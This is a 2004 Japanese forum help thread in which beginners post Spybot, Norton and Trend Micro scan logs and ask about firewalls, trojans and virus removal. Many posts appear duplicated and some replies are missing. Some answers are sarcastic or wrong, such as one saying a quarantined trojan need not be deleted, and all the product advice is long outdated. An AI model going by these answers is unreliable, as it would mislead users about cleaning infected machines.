DSO Exploit: Data source object exploit (レジストリ変更, fixed)
HKEY_USERS\S-1-5-21-682003330-162531612-2146954855-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3
DSO Exploit: Data source object exploit (レジストリ変更, fixed)
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3
--- Spybot - Search && Destroy version: 1.3 ---
2004-07-09 Includes\Cookies.sbi
2004-07-28 Includes\Dialer.sbi
2004-07-27 Includes\Hijackers.sbi
2004-07-27 Includes\Keyloggers.sbi
2004-05-12 Includes\LSP.sbi
2004-07-27 Includes\Malware.sbi
2004-07-09 Includes\Revision.sbi
2004-07-02 Includes\Security.sbi
2004-07-27 Includes\Spybots.sbi
2004-07-28 Includes\Tracks.uti
2004-07-27 Includes\Trojans.sbi
これ、再起動してもう一度検索してみたらまた出てきました・・・
削除されてないっぽいですか…?
でもリカバリーのところにちゃんとログみたいなのありました
レジストリ内ってCドライブでいいんでしょうか?
Cドライブ検索しましたがsystem.exe見つかりませんでした
>>833
DSO Exploit: Data source object exploit (レジストリ変更, fixed)
HKEY_USERS\S-1-5-21-682003330-162531612-2146954855-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3
DSO Exploit: Data source object exploit (レジストリ変更, fixed)
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3
--- Spybot - Search && Destroy version: 1.3 ---
2004-07-09 Includes\Cookies.sbi
2004-07-28 Includes\Dialer.sbi
2004-07-27 Includes\Hijackers.sbi
2004-07-27 Includes\Keyloggers.sbi
2004-05-12 Includes\LSP.sbi
2004-07-27 Includes\Malware.sbi
2004-07-09 Includes\Revision.sbi
2004-07-02 Includes\Security.sbi
2004-07-27 Includes\Spybots.sbi
2004-07-28 Includes\Tracks.uti
2004-07-27 Includes\Trojans.sbi
これ、再起動してもう一度検索してみたらまた出てきました・・・
削除されてないっぽいですか…?
でもリカバリーのところにちゃんとログみたいなのありました
840 :ひよこ名無しさん:04/08/04 19:04 ID:FKA0RLcA
・シマンテック セキュリティチェックでセキュリティチェックしたところ
対ハッカー露出度チェックで「要注意!」と出て
「推奨・ファイヤーウォールをインストールしてください」と出たんですが
初心者なもんでよくわからんです。
ファイヤーウォールのソフトを購入してインストールしろ!って事でしょうか。
現状で何か設定をいじってどうにかしろって事なのでしょうか?
対ハッカー露出度チェックで「要注意!」と出て
「推奨・ファイヤーウォールをインストールしてください」と出たんですが
初心者なもんでよくわからんです。
ファイヤーウォールのソフトを購入してインストールしろ!って事でしょうか。
現状で何か設定をいじってどうにかしろって事なのでしょうか?
>>840
フリーでもある。市販品の方が取り扱いは楽だと思うけど
【PFW】フリーファイアウォールベスト2
http://pc5.2ch.net/test/read.cgi/sec/1074431848/
フリーでもある。市販品の方が取り扱いは楽だと思うけど
【PFW】フリーファイアウォールベスト2
http://pc5.2ch.net/test/read.cgi/sec/1074431848/
842 :840:04/08/04 19:16 ID:FKA0RLcA
>>841
どうもです。リンク先熟読してきます。
どうもです。リンク先熟読してきます。
843 :840:04/08/04 19:57 ID:FKA0RLcA
ZoneAlarm pro(15日間お試しの方)を落として
ファイヤーウォール設定を「高」にしてみたんですけど
やっぱり>>840のチェックをしたら「ファイヤーウォールを・・」と出てしまいます。
んー・・どうしたらいいのやら・・・
ファイヤーウォール設定を「高」にしてみたんですけど
やっぱり>>840のチェックをしたら「ファイヤーウォールを・・」と出てしまいます。
んー・・どうしたらいいのやら・・・
ルータ買え
845 :840:04/08/04 20:40 ID:FKA0RLcA
ルータとは?
ネットワーク上を流れるデータを他のネットワークに中継する機器。
OSI参照モデルでいうネットワーク層(第3層)やトランスポート層(第4層)の一部のプロトコルを解析して転送を行なう。
ネットワーク層のアドレスを見て、どの経路を通して転送すべきかを判断する経路選択機能を持つ。
また、自分の対応しているプロトコル以外のデータはすべて破棄する。複数のプロトコルに対応したルータをマルチプロトコルルータと呼ぶ。
えーと・・量販店で「ルータのソフトください」って言えばいいのかしら?
ネットワーク上を流れるデータを他のネットワークに中継する機器。
OSI参照モデルでいうネットワーク層(第3層)やトランスポート層(第4層)の一部のプロトコルを解析して転送を行なう。
ネットワーク層のアドレスを見て、どの経路を通して転送すべきかを判断する経路選択機能を持つ。
また、自分の対応しているプロトコル以外のデータはすべて破棄する。複数のプロトコルに対応したルータをマルチプロトコルルータと呼ぶ。
えーと・・量販店で「ルータのソフトください」って言えばいいのかしら?
>>845
たぶん店員にハァ?バカこいつ?という顔をされます
たぶん店員にハァ?バカこいつ?という顔をされます
848 :840:04/08/04 20:55 ID:FKA0RLcA
>>848
Proceedをクリックしたら、次のページのAll Service Portsをクリックする。
Proceedをクリックしたら、次のページのAll Service Portsをクリックする。
850 :840:04/08/04 21:07 ID:FKA0RLcA
えーと、なんやら青いブロックがズラーと出てきて左に0〜1024、右に31〜1055って書いてあります。
1個だけ赤いのがあったんでクリックしたら「Port 80」と表示されました。
1個だけ赤いのがあったんでクリックしたら「Port 80」と表示されました。
854 :840:04/08/04 21:50 ID:FKA0RLcA
>>854
たぶん無理
Free版をインストールしようとしても、ZoneAlarmProを入れさせたがるから
それでも拒否して、はじめてFree版になる
Free版で十分に全ポートは塞げる、理解できなければ日本語版落とせ
たぶん無理
Free版をインストールしようとしても、ZoneAlarmProを入れさせたがるから
それでも拒否して、はじめてFree版になる
Free版で十分に全ポートは塞げる、理解できなければ日本語版落とせ
856 :ひよこ名無しさん:04/08/04 22:02 ID:FKA0RLcA
>>855
でも「お試し版」なので有料ではないんですよね?
あと>>852のも英文だったんだけど適当に落としたんですが、
そしたら再起動した後に数秒だけ「警告!」とかなんか文章が出たんだけど
すぐ消えちゃってその後、ツールが立ち上がったんですが
ネットに接続する度、
・このアプリケーションに関する活動を全て許可
・このアプリケーションに関する活動を全て遮断
・プリセットからツール作成
>今回は許可 >今回は遮断 >OK
って出るんですけど、これって任意の使用するサイトだけ「このアプリケーションに関する活動を全て許可」に
すれば余計なとこから攻撃を受けないって事なんでしょーか?
でも「お試し版」なので有料ではないんですよね?
あと>>852のも英文だったんだけど適当に落としたんですが、
そしたら再起動した後に数秒だけ「警告!」とかなんか文章が出たんだけど
すぐ消えちゃってその後、ツールが立ち上がったんですが
ネットに接続する度、
・このアプリケーションに関する活動を全て許可
・このアプリケーションに関する活動を全て遮断
・プリセットからツール作成
>今回は許可 >今回は遮断 >OK
って出るんですけど、これって任意の使用するサイトだけ「このアプリケーションに関する活動を全て許可」に
すれば余計なとこから攻撃を受けないって事なんでしょーか?
858 :840:04/08/04 22:13 ID:FKA0RLcA
んーじゃこの中途半端にツールを落として中途半端に設定した状態で
ネット接続を数日諦めて、ファイヤーウォール関係の本を読めと・・そういうことでしょうか?
ネット接続を数日諦めて、ファイヤーウォール関係の本を読めと・・そういうことでしょうか?
>>858
Yes。さいなら
Yes。さいなら
>>858
じゃあ、一通り基本を説明するぞ。
そのどうしますか?と聞いて来るのは、ネットに発信しようとしているアプリケーション。
ほとんどは、自分で発信した情報のリターンパケットが必要なだけなので、
サーバーとしてのアクセス許可は必要ない。
外部に対してだけ許可すればOK。
サーバーとして機能させたい場合
この時には、使用するポートを開けた上で、外部からの通信要求に答えるために、
そのアプリケーションに全てのアクセスを許可するように設定する。
じゃあ、一通り基本を説明するぞ。
そのどうしますか?と聞いて来るのは、ネットに発信しようとしているアプリケーション。
ほとんどは、自分で発信した情報のリターンパケットが必要なだけなので、
サーバーとしてのアクセス許可は必要ない。
外部に対してだけ許可すればOK。
サーバーとして機能させたい場合
この時には、使用するポートを開けた上で、外部からの通信要求に答えるために、
そのアプリケーションに全てのアクセスを許可するように設定する。
861 :ひよこ名無しさん:04/08/04 22:57 ID:FO+FsQrm
プログラムにrough riders_jpと見覚えもなくかなり怪しいのですが、これはウィルス
なのでしょうか?よいアドバイスをお待ちしております。
なのでしょうか?よいアドバイスをお待ちしております。
>>861
ウィルスですか?って聞く前にスキャンくらいしたらどうよ
ウィルススキャン後こっち行ってテンプレ実行
たぶんスパイウェア
エロサイト見たら…助けてください!Part36
http://pc6.2ch.net/test/read.cgi/pcqa/1091521211/
ウィルスですか?って聞く前にスキャンくらいしたらどうよ
ウィルススキャン後こっち行ってテンプレ実行
たぶんスパイウェア
エロサイト見たら…助けてください!Part36
http://pc6.2ch.net/test/read.cgi/pcqa/1091521211/
863 :ひよこ名無しさん:04/08/04 23:11 ID:qvaHAair
すみませんが、教えてください。
今トレンドマイクロオンラインウイルススキャンをしてみたら、
VBS REDLOF Aというウイルスが2435個も見つかってしまいました。
本当に何も分からず、その数に呆然としています。
対処法等、教えてください。お願いします…
今トレンドマイクロオンラインウイルススキャンをしてみたら、
VBS REDLOF Aというウイルスが2435個も見つかってしまいました。
本当に何も分からず、その数に呆然としています。
対処法等、教えてください。お願いします…
>>863
リカバリー
リカバリー
>>863
大杉。同じくリカバリー。
大杉。同じくリカバリー。
>>863
見つかった場所は?
見つかった場所は?
868 :863:04/08/04 23:14 ID:qvaHAair
やっぱり、それしかありませんか…。なんかすごい悲しいです。
多すぎますよね…。
駆除とかってやっぱり無理でしょうか。
あとこのウイルスって、何をするんでしょうか。
多すぎますよね…。
駆除とかってやっぱり無理でしょうか。
あとこのウイルスって、何をするんでしょうか。
おいおい。2434個だよ?治らん。見かけ上はまともでボロボロ。
2400個までは大丈夫なんだけどね。
2400個までは大丈夫なんだけどね。
>>868
なんというか、迷惑
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=VBS_REDLOF.A&VSect=T
なんというか、迷惑
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=VBS_REDLOF.A&VSect=T
871 :863:04/08/04 23:18 ID:qvaHAair
873 :863:04/08/04 23:20 ID:qvaHAair
>>873
REDLOFはメールでは拡大感染しない
REDLOFはメールでは拡大感染しない
875 :863:04/08/04 23:21 ID:qvaHAair
>>875
セキュリティパッチも当てない迷惑なやつ
セキュリティパッチも当てない迷惑なやつ
>>875
WindowsUpdateもしろよ
WindowsUpdateもしろよ
879 :863:04/08/05 00:01 ID:cxgcQ7gp
>>876
ごめんなさい。何も分からないからといって、さすがに無防備すぎでした。
>>877
何故気付かなかったのか、本当に自分でも謎です。
特別おかしいと思えるようなこともありませんでしたし…
ですが、一応ウイルスバスター2002は入ってました。
>>878
多分、手に入れて3年以上もせずに放置したせいだと思います。
この間はじめてしたのですが遅すぎました。
ところで、リカバリに向けて、今データのバックアップを取っているのですが、
これって感染したウイルスをバックアップ取ってしまってたりはしませんか?
ごめんなさい。何も分からないからといって、さすがに無防備すぎでした。
>>877
何故気付かなかったのか、本当に自分でも謎です。
特別おかしいと思えるようなこともありませんでしたし…
ですが、一応ウイルスバスター2002は入ってました。
>>878
多分、手に入れて3年以上もせずに放置したせいだと思います。
この間はじめてしたのですが遅すぎました。
ところで、リカバリに向けて、今データのバックアップを取っているのですが、
これって感染したウイルスをバックアップ取ってしまってたりはしませんか?
880 :ひよこ名無しさん:04/08/05 00:04 ID:fmatHTHm
C:\WINDOWS\dlm.html は Downloader.Trojan に感染しています。
C:\WINDOWS\doru32.dll は PWS.Hooker.Trojan に感染しています。
C:\WINDOWS\mstaskss.exe は Backdoor.Tofger に感染しています。
C:\WINDOWS\system32\appsys.exe は Download.Trojan に感染しています。
C:\WINDOWS\Downloaded Program Files\load.exe は Trojan Horse に感染しています。
C:\Program Files\gikoNavi\Log\2ch\wcomic\1059576479.dat は VBS.LoveLetter.A に感染しています。
C:\Program Files\gikoNavi\Log\2ch\qa\1057915942.dat は VBS.Network.E に感染しています。
C:\Program Files\gikoNavi\Log\2ch\qa\1062150855.dat は VBS.Network.E に感染しています。
C:\Program Files\gikoNavi\Log\2ch\qa\1063056072.dat は VBS.LoveLetter.Var に感染しています。
C:\Program Files\gikoNavi\Log\2ch\qa\1075573084.dat は Macro.src に感染しています。
C:\WINDOWS\doru32.dll は PWS.Hooker.Trojan に感染しています。
C:\WINDOWS\mstaskss.exe は Backdoor.Tofger に感染しています。
C:\WINDOWS\system32\appsys.exe は Download.Trojan に感染しています。
C:\WINDOWS\Downloaded Program Files\load.exe は Trojan Horse に感染しています。
C:\Program Files\gikoNavi\Log\2ch\wcomic\1059576479.dat は VBS.LoveLetter.A に感染しています。
C:\Program Files\gikoNavi\Log\2ch\qa\1057915942.dat は VBS.Network.E に感染しています。
C:\Program Files\gikoNavi\Log\2ch\qa\1062150855.dat は VBS.Network.E に感染しています。
C:\Program Files\gikoNavi\Log\2ch\qa\1063056072.dat は VBS.LoveLetter.Var に感染しています。
C:\Program Files\gikoNavi\Log\2ch\qa\1075573084.dat は Macro.src に感染しています。
881 :ひよこ名無しさん:04/08/05 00:05 ID:fmatHTHm
C:\Program Files\gikoNavi\Log\2ch\newsplus\1049261332.dat は Macro.src に感染しています。
C:\Program Files\gikoNavi\Log\2ch\newsplus\1058565121.dat は Macro.src に感染しています。
C:\Program Files\gikoNavi\Log\2ch\newsplus\1059134139.dat は Macro.src に感染しています。
C:\Program Files\gikoNavi\Log\2ch\newsplus\1061344904.dat は Macro.src に感染しています。
C:\Program Files\gikoNavi\Log\2ch\newsplus\1061438504.dat は Macro.src に感染しています。
C:\Program Files\gikoNavi\Log\2ch\newsplus\1061527856.dat は Macro.src に感染しています。
C:\Program Files\gikoNavi\Log\2ch\newsplus\1061630237.dat は Macro.src に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livetbs\1061388960.dat は VBS.LoveLetter.A に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livetbs\1072779302.dat は VBS.LoveLetter.Var に感染しています。
C:\Program Files\gikoNavi\Log\2ch\liventv\1059739702.dat は VBS.LoveLetter.A に感染しています。
C:\Program Files\gikoNavi\Log\2ch\liventv\1070110424.dat は VBS.LoveLetter.A に感染しています。
C:\Program Files\gikoNavi\Log\2ch\liventv\1082524186.dat は VBS.LoveLetter.Var に感染しています。
C:\Program Files\gikoNavi\Log\2ch\liventv\1082823919.dat は VBS.LoveLetter.CI に感染しています。
C:\Program Files\gikoNavi\Log\2ch\liventv\1088771700.dat は VBS.LoveLetter.A に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livenhk\1062066558.dat は VBS.Network.E に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1059120763.dat は VBS.Network.E に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1059577236.dat は VBS.LoveLetter.A に感染しています。
C:\Program Files\gikoNavi\Log\2ch\newsplus\1058565121.dat は Macro.src に感染しています。
C:\Program Files\gikoNavi\Log\2ch\newsplus\1059134139.dat は Macro.src に感染しています。
C:\Program Files\gikoNavi\Log\2ch\newsplus\1061344904.dat は Macro.src に感染しています。
C:\Program Files\gikoNavi\Log\2ch\newsplus\1061438504.dat は Macro.src に感染しています。
C:\Program Files\gikoNavi\Log\2ch\newsplus\1061527856.dat は Macro.src に感染しています。
C:\Program Files\gikoNavi\Log\2ch\newsplus\1061630237.dat は Macro.src に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livetbs\1061388960.dat は VBS.LoveLetter.A に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livetbs\1072779302.dat は VBS.LoveLetter.Var に感染しています。
C:\Program Files\gikoNavi\Log\2ch\liventv\1059739702.dat は VBS.LoveLetter.A に感染しています。
C:\Program Files\gikoNavi\Log\2ch\liventv\1070110424.dat は VBS.LoveLetter.A に感染しています。
C:\Program Files\gikoNavi\Log\2ch\liventv\1082524186.dat は VBS.LoveLetter.Var に感染しています。
C:\Program Files\gikoNavi\Log\2ch\liventv\1082823919.dat は VBS.LoveLetter.CI に感染しています。
C:\Program Files\gikoNavi\Log\2ch\liventv\1088771700.dat は VBS.LoveLetter.A に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livenhk\1062066558.dat は VBS.Network.E に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1059120763.dat は VBS.Network.E に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1059577236.dat は VBS.LoveLetter.A に感染しています。
882 :ひよこ名無しさん:04/08/05 00:06 ID:fmatHTHm
C:\Program Files\gikoNavi\Log\2ch\livecx\1059604860.dat は VBS.LoveLetter.A に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1061381387.dat は VBS.LoveLetter.A に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1061382600.dat は VBS.LoveLetter.A に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1061383798.dat は VBS.Network.E に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1062131174.dat は VBS.Network.E に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1062147989.dat は VBS.Network.E に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1063799560.dat は VBS.LoveLetter.A に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1063801436.dat は VBS.LoveLetter.A に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1065256779.dat は Macro.src に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1065261277.dat は Macro.src に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1069102622.dat は VBS.Network.E に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1071057570.dat は VBS.Network.E に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1061381387.dat は VBS.LoveLetter.A に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1061382600.dat は VBS.LoveLetter.A に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1061383798.dat は VBS.Network.E に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1062131174.dat は VBS.Network.E に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1062147989.dat は VBS.Network.E に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1063799560.dat は VBS.LoveLetter.A に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1063801436.dat は VBS.LoveLetter.A に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1065256779.dat は Macro.src に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1065261277.dat は Macro.src に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1069102622.dat は VBS.Network.E に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1071057570.dat は VBS.Network.E に感染しています。
883 :ひよこ名無しさん:04/08/05 00:07 ID:fmatHTHm
C:\Program Files\gikoNavi\Log\2ch\livecx\1072429939.dat は VBS.LoveLetter.Var に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1072452499.dat は VBS.LoveLetter.A に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1083662251.dat は VBS.LoveLetter.Var に感染しています。
C:\Program Files\gikoNavi\Log\2ch\liveanb\1062415814.dat は VBS.Network.E に感染しています。
C:\Program Files\gikoNavi\Log\2ch\jfoods\1055404179.dat は Macro.src に感染しています。
C:\Program Files\gikoNavi\Log\2ch\jfoods\1061608841.dat は Macro.src に感染しています。
C:\Program Files\gikoNavi\Log\2ch\gline\subject.txt は Unix.Penguin に感染しています。
C:\Program Files\gikoNavi\Log\2ch\ascii\1059267406.dat は VBS.LoveLetter.A に感染しています。
C:\Program Files\gikoNavi\Log\2ch\ascii\1074563937.dat は VBS.LoveLetter.Var に感染しています。
C:\Program Files\gikoNavi\Log\2ch\aasaloon\1047556388.dat は Macro.src に感染しています。
・・・とか出てしまったんですが、緊急性を要する物ってありますでしょうか?
何かやたら「ギコナビ〜」ってのが多い気がするんですがどうしてなんでしょう?
C:\Program Files\gikoNavi\Log\2ch\livecx\1072452499.dat は VBS.LoveLetter.A に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livecx\1083662251.dat は VBS.LoveLetter.Var に感染しています。
C:\Program Files\gikoNavi\Log\2ch\liveanb\1062415814.dat は VBS.Network.E に感染しています。
C:\Program Files\gikoNavi\Log\2ch\jfoods\1055404179.dat は Macro.src に感染しています。
C:\Program Files\gikoNavi\Log\2ch\jfoods\1061608841.dat は Macro.src に感染しています。
C:\Program Files\gikoNavi\Log\2ch\gline\subject.txt は Unix.Penguin に感染しています。
C:\Program Files\gikoNavi\Log\2ch\ascii\1059267406.dat は VBS.LoveLetter.A に感染しています。
C:\Program Files\gikoNavi\Log\2ch\ascii\1074563937.dat は VBS.LoveLetter.Var に感染しています。
C:\Program Files\gikoNavi\Log\2ch\aasaloon\1047556388.dat は Macro.src に感染しています。
・・・とか出てしまったんですが、緊急性を要する物ってありますでしょうか?
何かやたら「ギコナビ〜」ってのが多い気がするんですがどうしてなんでしょう?
>>883
んで、エロサイトいったせいで変な病気もらってる
んで、エロサイトいったせいで変な病気もらってる
>>879
ttp://www.trendmicro.com/jp/support/old-versions/old-versions/products/vb.htm
ウィルスバスター2002は、既にサポート期間終わってるぞ。
最新の定義にできるのかどうか知らないが、もしできないならフリーのアンチウィルスソフトでも入れとけ。
>>880-883のうち、ギコナビ関係のは無害。その他の感染ファイルはダメなやつ。
2400個のうち大半がギコナビなら、駆除可能かもよ?
ttp://www.trendmicro.com/jp/support/old-versions/old-versions/products/vb.htm
ウィルスバスター2002は、既にサポート期間終わってるぞ。
最新の定義にできるのかどうか知らないが、もしできないならフリーのアンチウィルスソフトでも入れとけ。
>>880-883のうち、ギコナビ関係のは無害。その他の感染ファイルはダメなやつ。
2400個のうち大半がギコナビなら、駆除可能かもよ?
888 :883:04/08/05 00:16 ID:fmatHTHm
あ、自分2400個の人とは別人です。
ありがとうございました。ギコナビ以外のを手動でなんとかしてみます。
ありがとうございました。ギコナビ以外のを手動でなんとかしてみます。
889 :863:04/08/05 00:18 ID:cxgcQ7gp
ウィルスバスター2004のお試し版を使っていたのですが試用期限が7月26日で切れてしまいました。
ところがあいかわらずプロダクトファイルのアップデートは定期的にされています。
これはまだ使えるということなのでしょうか?それとも表示が出るだけで
バージョンアップはされてないのでしょうか?
ところがあいかわらずプロダクトファイルのアップデートは定期的にされています。
これはまだ使えるということなのでしょうか?それとも表示が出るだけで
バージョンアップはされてないのでしょうか?
>>889
注意しておくのは、「常駐保護機能」を必ずONにしておく事。
たとえサポート期間が終わっているウィルスバスター2002でも、
それさえONにしていればそんな数にはならなかったはずだ。
ソフト持ってるなら、アップデートしてみて、ダメ元で駆除してみればいいのに。
注意しておくのは、「常駐保護機能」を必ずONにしておく事。
たとえサポート期間が終わっているウィルスバスター2002でも、
それさえONにしていればそんな数にはならなかったはずだ。
ソフト持ってるなら、アップデートしてみて、ダメ元で駆除してみればいいのに。
892 :ひよこ名無しさん:04/08/05 02:22 ID:Juu9kNwM
ペイントを開こうとしても
「このプログラムは不正な処理を〜」と出てきて開けません
詳細を開くと
MSPAINT のページ違反です。
モジュール : MFC42.DLL、アドレス : 015f:6ab1f9eb
Registers:
EAX=00000000 CS=015f EIP=6ab1f9eb EFLGS=00010202
EBX=005861d4 SS=0167 ESP=0056f91c EBP=0056f940
ECX=00007fff DS=0167 ESI=00691530 FS=4b07
EDX=00019ee4 ES=0167 EDI=0056f950 GS=0000
Bytes at CS:EIP:
89 48 58 8b 45 fc 3b 47 0c 7c cf 33 f6 39 77 0c
Stack dump:
と出てきます。どうでしょう?ウィルスでしょうか?
「このプログラムは不正な処理を〜」と出てきて開けません
詳細を開くと
MSPAINT のページ違反です。
モジュール : MFC42.DLL、アドレス : 015f:6ab1f9eb
Registers:
EAX=00000000 CS=015f EIP=6ab1f9eb EFLGS=00010202
EBX=005861d4 SS=0167 ESP=0056f91c EBP=0056f940
ECX=00007fff DS=0167 ESI=00691530 FS=4b07
EDX=00019ee4 ES=0167 EDI=0056f950 GS=0000
Bytes at CS:EIP:
89 48 58 8b 45 fc 3b 47 0c 7c cf 33 f6 39 77 0c
Stack dump:
と出てきます。どうでしょう?ウィルスでしょうか?
>>892
聞く前にウイルス検査しろ。
聞く前にウイルス検査しろ。
894 :ひよこ名無しさん:04/08/05 03:36 ID:RNID5Yq/
質問です。
晒されたURLで、拡張子はJPGだけど実はウイルスってやつですが、
「DLソフトで落とす→Susieプラグイン対応ビューアで見る」
ってやれば感染する心配は無いんでしょうか?
晒されたURLで、拡張子はJPGだけど実はウイルスってやつですが、
「DLソフトで落とす→Susieプラグイン対応ビューアで見る」
ってやれば感染する心配は無いんでしょうか?
896 :894:04/08/05 03:45 ID:RNID5Yq/
ノートンによるチェックの後、Troyan.ByteVerifyというウィルスが発見されました。
修復はできなかったようで、そのファイルは今検疫のところにあります。
シマンテックのHPに書いてある駆除方法を試してみましたが、うまくいきませんでした。
検疫の画面から修復しようとしてもダメです。
ファイル名はCounter.classとVerifierBug.classです。
このまま削除してしまってもいいのでしょうか。
修復はできなかったようで、そのファイルは今検疫のところにあります。
シマンテックのHPに書いてある駆除方法を試してみましたが、うまくいきませんでした。
検疫の画面から修復しようとしてもダメです。
ファイル名はCounter.classとVerifierBug.classです。
このまま削除してしまってもいいのでしょうか。
>>897
手動で駆除しようとしたってこと?
手動で駆除しようとしたってこと?
>>898
システムの完全スキャンをしました。
システムの完全スキャンをしました。
シマンテックのページを見る限りでは……。
システムの復元オプションを無効化後
修復モードで起動してファイルを削除。
コレで良いと思う。
システムの復元オプションを無効化後
修復モードで起動してファイルを削除。
コレで良いと思う。
>>900
ウチは2000なので、システムの復元オプションの無効化は無視しました。
シマンテックのページを見る限り、それでよさそうでしたので。
修復モードで起動というのがよく分からないのですが、どういうことでしょうか。
ウチは2000なので、システムの復元オプションの無効化は無視しました。
シマンテックのページを見る限り、それでよさそうでしたので。
修復モードで起動というのがよく分からないのですが、どういうことでしょうか。
>>902>>903
修復モード=セーフモードということでしたか。
903さんのおっしゃられたページを参考にして、これまで作業をしてきたんですが、
最後の4番目、「感染ファイルの削除」というところで詰まっています。
システム全体のスキャンをしても、検疫のところにあるからなのか、ウィルスが見つかりません。
単純に、検疫フォルダにあるウィルスファイルを削除してしまえばいいということなんでしょうか。
もしそうだとしたら、この2つのファイルは削除してしまっていいファイルなんでしょうか。
修復モード=セーフモードということでしたか。
903さんのおっしゃられたページを参考にして、これまで作業をしてきたんですが、
最後の4番目、「感染ファイルの削除」というところで詰まっています。
システム全体のスキャンをしても、検疫のところにあるからなのか、ウィルスが見つかりません。
単純に、検疫フォルダにあるウィルスファイルを削除してしまえばいいということなんでしょうか。
もしそうだとしたら、この2つのファイルは削除してしまっていいファイルなんでしょうか。
>>904
トロイの本体ファイル持っててどうすんの?
トロイの本体ファイル持っててどうすんの?
どなたかご存知の方いませんか?
ウィルスバスター2004の評価版を使っていて、試用期限が切れたのですが
まだプロダクトファイルのアップデートが定期的にされ続けてます。
このままでいいんでしょうか?
ウィルスバスター2004の評価版を使っていて、試用期限が切れたのですが
まだプロダクトファイルのアップデートが定期的にされ続けてます。
このままでいいんでしょうか?
>>906
情報取られて逮捕。
情報取られて逮捕。
>>905
もちろんウイルスファイルを捨てることが第一なんですが、
Counter.classとVerifierBug.classのファイルを削除することで、何か不具合があったらイヤだなぁと思いまして。
もちろんウイルスファイルを捨てることが第一なんですが、
Counter.classとVerifierBug.classのファイルを削除することで、何か不具合があったらイヤだなぁと思いまして。
>>908
削除しなくていいよ 誰も何も困る事はない
削除しなくていいよ 誰も何も困る事はない
すみませんが、どなたか教えていただけると幸いです。
ttp://www5f.biglobe.ne.jp/~imasaki/
↑このURLを踏んでしまったのですが、ウィルス感染はするのでしょうか?
オンラインスキャンをしてみたら、一個も出なかったので安心したのですが・・・。
お願いいたします・・・。
ttp://www5f.biglobe.ne.jp/~imasaki/
↑このURLを踏んでしまったのですが、ウィルス感染はするのでしょうか?
オンラインスキャンをしてみたら、一個も出なかったので安心したのですが・・・。
お願いいたします・・・。
912 :ひよこ名無しさん:04/08/06 18:48 ID:76/PKdYY
度々ほんっとすみません!sage入れっぱなしでした・・・。
すみませんが、どなたか教えていただけると幸いです。
ttp://www5f.biglobe.ne.jp/~imasaki/
↑このURLを踏んでしまったのですが、ウィルス感染はするのでしょうか?
オンラインスキャンをしてみたら、一個も出なかったので安心したのですが・・・。
お願いいたします・・・。
すみませんが、どなたか教えていただけると幸いです。
ttp://www5f.biglobe.ne.jp/~imasaki/
↑このURLを踏んでしまったのですが、ウィルス感染はするのでしょうか?
オンラインスキャンをしてみたら、一個も出なかったので安心したのですが・・・。
お願いいたします・・・。
>>912
窓の手使え
窓の手使え
>>912
ざけんな 何にも表示されめえよ
ざけんな 何にも表示されめえよ
915 :912:04/08/06 19:01 ID:76/PKdYY
>>913
レスありがとうございます!
インストールしてみました。
>>914
URLを開くとウィルス感染してしまう類の物かと思っていたんです・・・。
何もないページで、ウィルスもないのでしょうか?
お手数をお掛けしてすみません・・・。
レスありがとうございます!
インストールしてみました。
>>914
URLを開くとウィルス感染してしまう類の物かと思っていたんです・・・。
何もないページで、ウィルスもないのでしょうか?
お手数をお掛けしてすみません・・・。
質問です。
ウィルスにやられてしまい、PCも立ち上げることができなくなってしまった(起動しようとすると青い画面が出て最初に戻ってしまいます。)のでフォーマットしようと思います。
壊れる前にリカバリディスクを作っていなかったのですが、
他のPCからでも作ることはできますか?
ウィルスにやられてしまい、PCも立ち上げることができなくなってしまった(起動しようとすると青い画面が出て最初に戻ってしまいます。)のでフォーマットしようと思います。
壊れる前にリカバリディスクを作っていなかったのですが、
他のPCからでも作ることはできますか?
そしてOSは不明と
>>916
※E-mail欄(省略可) には何も記入しないこと。(ID出す→偽者対策・質問者の区別)
※E-mail欄(省略可) には何も記入しないこと。(ID出す→偽者対策・質問者の区別)
919 :916:04/08/06 19:43 ID:90pWnYB5
すいませんでした。
OSはXP HOME EDITION
SONY VAIO GRX 52です。
